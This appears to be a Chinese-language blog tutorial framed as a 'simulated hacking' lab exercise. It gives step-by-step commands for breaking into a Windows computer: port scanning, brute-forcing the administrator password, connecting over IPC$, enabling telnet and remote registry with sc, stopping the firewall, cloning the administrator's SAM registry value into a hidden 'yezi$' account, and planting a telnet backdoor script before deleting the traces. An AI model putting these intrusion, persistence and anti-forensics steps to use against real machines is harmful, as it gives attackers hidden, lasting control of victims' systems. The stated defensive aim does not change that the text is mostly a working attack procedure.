模拟黑客攻击

 

实验名称: 模拟黑客攻击计算机
实验需求描述 : 通过模拟攻击实验明白黑客攻击原理,做好防范。
试验步骤:
一:扫描目标计算机
使用扫描软件扫描目标计算机,确定开放的端口,判断操作系统的类型。
扫描软件推荐使用X-Scan,SuperScan,Nmap和流光
在这里使用X-Scan
 
二:获得管理权限
根据扫描结果,尝试暴力破解管理员账户的密码。X-Scan,流光,LC5等软件都提供了暴力破解功能,破解后会自动生成报告
三:入侵目标计算机(必须知道了破解了密码,否则一切免谈)
1.         使用管理员的账户建立 IPC链接,命令为“net use \\对方IP 密码 /user:administrator”
1.     使用sc命令目标计算机的所有服务列表,并保存到本地,命令为“sc \对方IP query type= service state= all >c:\yue.txt”
     到c盘,打开yue.txt文件,找到telnet,确认telnet的服务状态(默认为禁用状态)
 
 
如果知道 telnet的服务名称,可以直接使用命令行查看,命令为“sc \\IP qc tlntsvr”
 
去除 telnet服务的禁用状态,设置为自动运行,命令为“sc \\IP config tlntsvr start= auto”.
1.     然后启用telnet服务,命令为“sc \\IP start tlntsvr”.
 
停用目标计算机的 windows防火墙,命令为“sc \\IP stop sharedaccess”.
 
   确认目标计算机启用了远程注册表服务,命令为“sc \\IP qc romoteregistry”如果该服务为停用状态,则启用。
四:添加隐藏用户
 1.建立telnet连接,管理目标计算机,命令为“telnet IP”连接成功后输入管理员的账户和密码
通过 telnet,在目标计算机上建立隐藏账户,命令为“net user 名字$ 密码/add”.
在本地运行“ RegEdit”,在注册表编辑器中选择“文件-连接网络注册表”在选择计算机的窗口中输入目标计算机的地址,并提供目标计算机的用户名和密码。
 
 
 
 
 
打开目标计算机的注册表,右击“HKEY_LOCAL_MACHINE 项下的“SAM 项下的“SAM”选择“权限”
SAN权限窗口中,赋予管理员完全控制权限,断开与目标计算机的连接,然后重新建立连接。
 
展开目标计算机的
展开目标计算机
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位1F4的子项,该项和administrator相对应
双击右侧窗格1F4下的F键值,复制F值下的全部数据

展开目标计算机
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位3EE的子项,使用从1F4项复制的数据覆盖3EE项F键值的数据
导出目标计算机注册表的yezi$项和000003EE项保存到本地,并命名一下,后缀是.reg格式。
 
 
 
 
返回到telnet命令行,删除目标计算机的账户yezi$,命令为“net user yezi$/delete .
在目标计算机上导入yezi1.reg和yezi.reg.命令为“reg import yezi1.reg和reg import yezi2.reg . 完成本步后将真正的在目标计算机上建立一个隐藏用户。使用命令行或图形工具都不能查看到,但在注册表中可以看见。
 
删除目前和目标计算机的IPC连接,命令为“net user \\对方IP delete .
打开目标计算机的注册表,右击
HKEY_LOCAL_MACHINE\SAM\SAM 选择“权限”取出管理员的读取和完全控制权限,恢复到默认状态。
五:保留管理后门,隐藏攻击痕迹。
在本地建立一个名为open23.bat的脚本文件,内容
如下;将其拷贝到“\\目标IP\C$下。
建立telnet连接,进入目标计算机的C盘运行open23.bat脚本。运行成功后重新启动windows防火墙,并且开启TCP和UDP的23端口以允许telnet连接通过防火墙,
最后,删除目标计算机上的遗留文件,如;open23.bat.从此以后,可以在目标计算机上来去自如,跟主人一样

 

 

 

你可能感兴趣的:(黑客攻击,黑客)